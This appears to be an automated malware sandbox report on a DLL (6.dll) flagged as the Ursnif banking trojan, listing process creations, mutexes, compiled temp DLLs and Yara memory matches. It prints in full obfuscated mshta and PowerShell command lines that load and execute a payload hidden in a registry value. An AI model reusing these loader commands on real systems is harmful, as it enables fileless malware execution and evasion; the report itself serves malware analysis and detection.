Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown
Source: C:\Windows\System32\control.exe | Process created: unknown unknown
Source: C:\Windows\System32\control.exe | Process created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1
            Source: classification engineClassification label: mal100.troj.evad.winDLL@59/52@16/4
            Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F13309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 4_2_00F13309
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{542DFF7D-A3B8-A645-CDC8-873A517CAB0E}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B0E37361-4FA3-62B8-59E4-F3B69D58D74A}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
            Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{80FA9EC6-DFAB-B287-69B4-8306AD28679A}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
            Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{EC2366C9-5BCE-FEAF-45E0-BF1249146366}
            Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: 6.dll | Static file information: File size 1781920 > 1048576
            Source: 6.dll | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1B073 push ecx; ret 4_2_00F1B083
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1E97E pushad ; iretd 4_2_00F1E982
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1AD40 push ecx; ret 4_2_00F1AD49
            Source: 6.dll | Static PE information: real checksum: 0x1ba6ec should be: 0x1b8278
            Source: nigogz4l.dll.33.dr | Static PE information: real checksum: 0x0 should be: 0xee8b
            Source: dtnsoflb.dll.43.dr | Static PE information: real checksum: 0x0 should be: 0x4b02
            Source: nlbomp32.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0xf45d
            Source: uu5u2nmv.dll.40.dr | Static PE information: real checksum: 0x0 should be: 0xa363
            Source: wklr4juq.dll.36.dr | Static PE information: real checksum: 0x0 should be: 0x1029d
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
